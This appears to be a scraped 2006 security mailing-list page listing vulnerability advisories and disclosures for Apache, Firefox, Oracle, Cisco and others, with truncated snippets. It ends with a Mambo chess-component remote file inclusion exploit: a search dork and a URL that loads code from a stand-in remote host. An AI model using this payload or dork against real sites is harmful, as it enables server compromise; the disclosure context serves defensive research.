|
|
Colapse all |
Post message
PrinceClan Chess Mambo Com <= 0.8 Remote Inclusion Vulnerability 2006-07-24 tr_zindan wolfsecurity org Guestbook Mambo Module <== v1.3.0 Multiple Remote File Include Vulnerabilities 2006-07-28 matdhule gmail com [SECURITY] [DSA 1129-1] New osiris packages fix arbitrary code execution 2006-07-28 joey infodrom org (Martin Schulze) Apache mod_rewrite Buffer Overflow Vulnerability 2006-07-28 Avert avertlabs com McAfee, Inc. McAfee Avert(tm) Labs Security Advisory Public Release Date: 2006-07-09 Apache 1.3.29/2.X mod_rewrite Buffer Over Vulnerability CVE-2006-3747 ______________________________________________________________________ * Synopsis Mod_rewrite is an Apache module that can be used [ more ] [ reply ] [Announcement] Apache HTTP Server 2.2.3 (2.0.59, 1.3.37) Released 2006-07-28 William A. Rowe, Jr. (wrowe apache org) Oracle 10g R2 and, probably, all previous versions 2006-07-28 Russell Lowenthal (perpetualv yahoo com) Interesting comment. So if I understand what you are saying I should be able to create a user: SQL> create user nottoosmart identified by d0ntkn0wmuch; User created. SQL> grant create session to nottoosmart; Grant succeeded. SQL> connect nottoosmart/d0ntkn0wmuch Connected. SQL> alter session se [ more ] [ reply ] [ MDKSA-2006:132 ] - Updated libwmf packages fixes integer overflow vulnerability 2006-07-28 security mandriva com [SECURITY] [DSA 1128-1] New heartbeat packages fix local denial of service 2006-07-28 joey infodrom org (Martin Schulze) [SECURITY] [DSA 1127-1] New ethereal packages fix several vulnerabilities 2006-07-28 Moritz Muehlenhoff (jmm debian org) [FLSA-2006:175040] Updated php packages fix security issues 2006-07-28 Marc Deslauriers (marcdeslauriers videotron ca) [USN-328-1] Apache vulnerability 2006-07-28 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-328-1 July 27, 2006 apache2 vulnerability CVE-2006-3747 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 U [ more ] [ reply ] Cisco Security Advisory: Windows VPN Client Local Privilege Escalation Vulnerability 2006-07-27 Cisco Systems Product Security Incident Response Team (psirt cisco com) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Windows VPN Client Local Privilege Escalation Vulnerability Document ID: 70332 Advisory ID: cisco-sa-20060524-vpnclient http://www.cisco.com/warp/public/707/cisco-sa-20060524-vpnclient.shtml Revision 2.0 Last Updated 2006 [ more ] [ reply ] [USN-327-1] firefox vulnerabilities 2006-07-27 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-327-1 July 27, 2006 firefox vulnerabilities CVE-2006-3113, CVE-2006-3677, CVE-2006-3801, CVE-2006-3802, CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2 [ more ] [ reply ] Re: HYSA-2006-008 myBloggie 2.1.3 CRLF & SQL Injection 2006-07-27 Steven M. Christey (coley mitre org) >--==CRLF injection==-- > >GET /mybloggie/ HTTP/1.0 >Accept: */* >User-Agent: Mozilla/4.0 (compatible; MSIE 6.0) >Host: 127.0.0.1:80 >Cookie: PHPSESSID=op0-11{}};q, or something like that >Connection: Close This demonstration code does not contain any carriage return / line feed sequences. What [ more ] [ reply ] Oracle 10g R2 and, probably, all previous versions 2006-07-27 putosoft softputo (hasecorp hotmail com) I can't believe it. Oracle releases new patches and they have not been solved one of the main problems: A user with only the SELECT privilege can do WHATEVER (S)HE WANTS WITH THE ENTIRE DATABASE!!!! I'm not sure if is time to full disclosure it but, anyway, I will "full disclosure" one inocent i [ more ] [ reply ] AIM Triton 1.0.4 (SipXtapi) Remote Buffer Overflow Exploit (PoC) 2006-07-27 c0rrupt f34r us greetz... #!/usr/bin/perl # # p0c # Tested on Windows XP SP2 with triton 1.0.4 # c0rrupt -{at}- f34r -{dot}- us # # This exploits the sipxtapi vuln in triton which was patched.. sometime ago.. # The exploit sends a specially crafted udp packet to the triton client # which leads to comm [ more ] [ reply ] rPSA-2006-0137-1 firefox 2006-07-27 Justin M. Forbes (jmforbes rpath com) rPath Security Advisory: 2006-0137-1 Published: 2006-07-26 Products: rPath Linux 1 Rating: Major Exposure Level Classification: User Deterministic Unauthorized Access Updated Versions: firefox=/conary.rpath.com@rpl:devel//1/1.5.0.5-1-0.1 References: http://www.cve.mitre.org/cgi-bin/cven [ more ] [ reply ] ZDI-06-025: Mozilla Firefox Javascript navigator Object Vulnerability 2006-07-26 zdi-disclosures 3com com ZDI-06-025: Mozilla Firefox Javascript navigator Object Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-025.html July 26, 2006 -- CVE ID: CVE-2006-3677 -- Affected Vendor: Mozilla -- Affected Products: Firefox 1.5.0 - 1.5.0.4 SeaMonkey 1.0 - 1.0.2 -- TippingPoint(TM) IPS Custome [ more ] [ reply ] Bypassing Oracle dbms_assert 2006-07-27 ak red-database-security com (1 replies) Hey all, Today I released a new whitepaper "Bypassing Oracle dbms_assert". This technique makes many already fixed Oracle vulnerabilities (SQL Injection) exploitable again. URL: http://www.red-database-security.com/wp/bypass_dbms_assert.pdf Summary: By using specially crafted parameters [ more ] [ reply ] Re: Bypassing Oracle dbms_assert 2006-07-28 David Litchfield (davidl ngssoftware com) (1 replies) RE: Bypassing Oracle dbms_assert 2006-07-28 Alexander Kornbrust (ak red-database-security com) (1 replies) |
|
Privacy Statement |
email: tr_zindan (at) wolfsecurity (dot) org [email concealed]
Url: http://www.hack-ezine.org
Greetz:EL_MuHaMMeD,CyberWolf,By_MaCRo And ALL WolFSecurityTeam USer
dor:inurl:com_pcchess
Exploit:
http://[host.com]/[path]/components/com_pcchess/include.pcchess.php?mosC
onfig_absolute_path=http://evil.txt?
[ more ] [ reply ]